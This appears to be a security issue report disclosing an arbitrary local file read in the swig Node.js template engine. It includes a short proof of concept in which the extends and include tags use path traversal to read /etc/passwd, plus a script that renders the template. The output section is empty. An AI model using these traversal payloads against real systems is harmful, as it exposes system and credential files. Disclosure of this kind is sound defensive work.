Security Issue: arbitrary local file read vulnerability during template rendering

[y1nglamore]

official doc:

• https://node-swig.github.io/swig-templates/docs/tags/#include
• https://node-swig.github.io/swig-templates/docs/tags/#extends

poc:

1.html
{% extends '../../../../../etc/passwd' %}
{% include '../../../../../etc/passwd' %}

// run.js
var swig = require('swig');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);

output: